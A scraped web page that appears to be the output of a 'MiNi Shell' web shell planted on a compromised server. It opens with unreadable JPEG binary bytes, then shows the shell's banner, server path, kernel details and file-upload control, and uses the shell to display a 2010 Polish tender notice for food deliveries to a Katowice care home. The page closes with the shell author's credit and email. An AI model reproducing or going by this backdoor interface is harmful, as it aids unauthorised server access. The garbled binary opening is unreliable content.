JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100312/70510-N-2010.html

<p class="kh_header"><b>Katowice: Zakup wraz z dostawą nabiału, dżemów, konserw oraz oleju</b><br>
<b>Numer ogłoszenia: 70510 - 2010; data zamieszczenia: 12.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej ZACISZE , ul. Traktorzystów 42, 40-695 Katowice, woj. śląskie, tel. 0-32 2025432, faks 0-32 2524860.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wraz z dostawą nabiału, dżemów, konserw oraz oleju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup wraz z dostawą nabiału, dżemów, konserw oraz oleju. 

1.	Nazwy i kody Wspólnego Słownika Zamówień (CPV) 

Produkty mleczarskie		   -	15500000-5
Konserwy, przetwory z mięsa	   -	15131000-5
Dżemy				   -	15332290-3
Olej i tłuszcze zwierzęce i roślinne -	15400000-2
     Soki owocowe i warzywne	  -	15320000-7
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 5 do SIWZ.

2.  Przedmiotem zamówienia jest zakup wraz z dostawą nabiału, dżemów, konserw oraz oleju,   
     których dokładne wyszczególnienie oraz ilości zawarte zostały w załączniku nr 5                               
     do niniejszej specyfikacji - szczegółowe zestawienie ilościowe przedmiotu zamówienia.
3.  Zamawiający zastrzega sobie prawo do zmian ilościowych przedmiotu zamówienia                
     do wysokości ceny sprzedaży określonej w umowie.
4.  Miejsce realizacji dostawy przedmiotu zamówienia: Dom Pomocy Społecznej Zacisze     
     w Katowicach przy ul. Traktorzystów 42.
5.  Zastosowanie wskazanych w dokumentacji zamawiającego preferencji opisujących  
     wymagania odnoszące się do cech technicznych i jakościowych przedmiotu zamówienia   
     podyktowane jest potrzebą zapewnienia preferowanej przez zamawiającego najwyższej  
     jakości w zakresie przedmiotu zamówienia (dot. przedmiotu zamówienia - art. 29 ustawy    
     Pzp).





6.  Wymagania w zakresie przedmiotu zamówienia:
    a)   każdy produkt wytwarzany będzie zgodnie z ustawą o bezpieczeństwie żywienia                          
          i żywności oraz rozporządzeniami wydanymi na jej podstawie,
    b)   każdy produkt realizowany będzie zgodnie z normami jakościowymi GHP,                            
          GMP lub HACCP,
    c)   każdy dostarczony produkt winien być I klasy, zgodny z Polską Normą,                                  
    d)  na każde żądanie zamawiającego, wykonawca jest zobowiązany okazać w stosunku  
          do każdego produktu odpowiedni certyfikat zgodności z Polską Normą                                                    
          lub normami europejskimi itp.
7.  Każde opakowanie musi obligatoryjnie zawierać następujące dane
    a)   nazwę środka spożywczego,
    b)   dane dotyczące składników występujących w środku spożywczym,
    c)   datę minimalnej trwałości albo termin przydatności do spożycia,
    d)   dane identyfikujące producenta środka spożywczego,
    e)   dane identyfikujące kraj, w którym wyprodukowano środek spożywczy,
    f)   zawartość netto lub liczbę sztuk środka spożywczego w opakowaniu,
    g)   warunki przechowywania, w przypadku gdy jego jakość zależy od warunków              
          przechowywania,
    h)   oznaczenie partii produkcji,
    i)    klasę jakości handlowej.
8.  Cechy dyskwalifikujące dla przedmiotu zamówienia:
     Obce posmaki, zapachy, oślizgłość, nalot pleśni, obecność szkodników oraz ich   
     pozostałości, brak oznakowania opakowań, ich uszkodzenie mechaniczne,                 
     zerwanie plomby, zabrudzenia, itp.
9.  Wymagania w zakresie opakowań
    Opakowania powinny być ułożone w sposób nie powodujący deformacji i zapewniający  
    estetyczny wygląd gotowego wyrobu.
10. Wymagania stawiane wykonawcy:
      a)   wykonawca odpowiedzialny będzie za całokształt, w tym za przebieg oraz terminowe  
            wykonanie zamówienia w okresie wykonania umowy,
      b)   wykonawca odpowiedzialny będzie za jakość dostaw, zgodność z wymaganiami  
            jakościowymi określonymi dla przedmiotu zamówienia,
      c)   wymagana jest należyta staranność przy realizacji zamówienia rozumiana jako 
            staranność profesjonalisty w działalności objętej przedmiotem zamówienia,
      d)   ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą wyłącznie 
            przez ustanowionych przedstawicieli zamawiającego i wykonawcy,
      e)   reklamacje dotyczące stwierdzonych nieprawidłowości, wad, załatwiane będą                    
            z należytą starannością rozumianą jako staranność profesjonalisty w działalności  
            objętej przedmiotem zamówienia, w terminie nie dłuższym niż 3 dni.

Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez wykonawcę podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zakup wraz z dostawą nabiału, dżemów, konserw oraz oleju. 

1.	Nazwy i kody Wspólnego Słownika Zamówień (CPV) 

Produkty mleczarskie		   -	15500000-5
Konserwy, przetwory z mięsa	   -	15131000-5
Dżemy				   -	15332290-3
Olej i tłuszcze zwierzęce i roślinne -	15400000-2
     Soki owocowe i warzywne	  -	15320000-7

2.  Przedmiotem zamówienia jest zakup wraz z dostawą nabiału, dżemów, konserw oraz oleju,   
     których dokładne wyszczególnienie oraz ilości zawarte zostały w załączniku nr 5                               
     do niniejszej specyfikacji - szczegółowe zestawienie ilościowe przedmiotu zamówienia.
3.  Zamawiający zastrzega sobie prawo do zmian ilościowych przedmiotu zamówienia                
     do wysokości ceny sprzedaży określonej w umowie.
4.  Miejsce realizacji dostawy przedmiotu zamówienia: Dom Pomocy Społecznej Zacisze    
     w Katowicach przy ul. Traktorzystów 42.
5.  Zastosowanie wskazanych w dokumentacji zamawiającego preferencji opisujących  
     wymagania odnoszące się do cech technicznych i jakościowych przedmiotu zamówienia   
     podyktowane jest potrzebą zapewnienia preferowanej przez zamawiającego najwyższej  
     jakości w zakresie przedmiotu zamówienia (dot. przedmiotu zamówienia - art. 29 ustawy    
     Pzp).





6.  Wymagania w zakresie przedmiotu zamówienia:
    a)   każdy produkt wytwarzany będzie zgodnie z ustawą o bezpieczeństwie żywienia                          
          i żywności oraz rozporządzeniami wydanymi na jej podstawie,
    b)   każdy produkt realizowany będzie zgodnie z normami jakościowymi GHP,                            
          GMP lub HACCP,
    c)   każdy dostarczony produkt winien być I klasy, zgodny z Polską Normą,                                  
    d)  na każde żądanie zamawiającego, wykonawca jest zobowiązany okazać w stosunku  
          do każdego produktu odpowiedni certyfikat zgodności z Polską Normą                                                    
          lub normami europejskimi itp.
7.  Każde opakowanie musi obligatoryjnie zawierać następujące dane:
    a)   nazwę środka spożywczego,
    b)   dane dotyczące składników występujących w środku spożywczym,
    c)   datę minimalnej trwałości albo termin przydatności do spożycia,
    d)   dane identyfikujące producenta środka spożywczego,
    e)   dane identyfikujące kraj, w którym wyprodukowano środek spożywczy,
    f)   zawartość netto lub liczbę sztuk środka spożywczego w opakowaniu,
    g)   warunki przechowywania, w przypadku gdy jego jakość zależy od warunków              
          przechowywania,
    h)   oznaczenie partii produkcji,
    i)    klasę jakości handlowej.
8.  Cechy dyskwalifikujące dla przedmiotu zamówienia:
     Obce posmaki, zapachy, oślizgłość, nalot pleśni, obecność szkodników oraz ich   
     pozostałości, brak oznakowania opakowań, ich uszkodzenie mechaniczne,                 
     zerwanie plomby, zabrudzenia, itp.
9.  Wymagania w zakresie opakowań
    Opakowania powinny być ułożone w sposób nie powodujący deformacji i zapewniający  
    estetyczny wygląd gotowego wyrobu.
10. Wymagania stawiane wykonawcy
      a)   wykonawca odpowiedzialny będzie za całokształt, w tym za przebieg oraz terminowe  
            wykonanie zamówienia w okresie wykonania umowy,
      b)   wykonawca odpowiedzialny będzie za jakość dostaw, zgodność z wymaganiami  
            jakościowymi określonymi dla przedmiotu zamówienia,
      c)   wymagana jest należyta staranność przy realizacji zamówienia rozumiana jako 
            staranność profesjonalisty w działalności objętej przedmiotem zamówienia,
      d)   ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą wyłącznie 
            przez ustanowionych przedstawicieli zamawiającego i wykonawcy,
      e)   reklamacje dotyczące stwierdzonych nieprawidłowości, wad, załatwiane będą                    
            z należytą starannością rozumianą jako staranność profesjonalisty w działalności  
            objętej przedmiotem zamówienia, w terminie nie dłuższym niż 3 dni.

Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez wykonawcę podczas wykonywania przedmiotu zamówienia.
Asortyment wymieniony w załączniku nr 5 w ilości nieprzekraczającej wartości 20 % zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-5, 15.13.10.00-5, 15.33.22.90-3, 15.40.00.00-2, 15.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym  okresie wykonał lub wykonuje 3 dostawy o charakterze i złożoności porównywalnej z zakresem niniejszego zamówienia z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi należyte wykonanie lub wykonywanie dostawy.
W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą:
a)	wykaz wykonanych lub wykonywanych dostaw w zakresie niezbędnym do wykazania    
     spełniania warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed upływem terminu    
składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,                              z podaniem ich wartości przedmiotu, dat wykonania i odbiorców - zgodnie z załącznikiem nr 4 do  SIWZ,
           

               b)  dokumenty potwierdzające, że dostawy (wykazane w wykazie, o którym mowa 
              powyżej) zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi                     
          do wykonania zamówienia. 
          Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, iż na czas realizacji  
          zamówienia będzie dysponował transportem spełniającym wymagania określone odrębnymi    
          przepisami,  pozwalającym wykonać dostawę przedmiotu zamówienia.
     W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej,   
     Wykonawca zobowiązany jest przedłożyć wraz z ofertą stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacji ekonomicznej i finansowej.
    W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej,   
    Wykonawca zobowiązany jest przedłożyć wraz z ofertą stosowne oświadczenie.
3.	    W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa                          
       w pkt  od 2.1. do 2.4. oprócz dokumentów wyszczególnionych powyżej, należy złożyć    
       oświadczenie, zgodne z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.biuletyn.abip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Zacisze 40-695 Katowice, ul Traktorzystów 42.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2010 godzina 09:15, miejsce: Dom Pomocy Społecznej Zacisze 40-695 Katowice, ul Traktorzystów 42.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com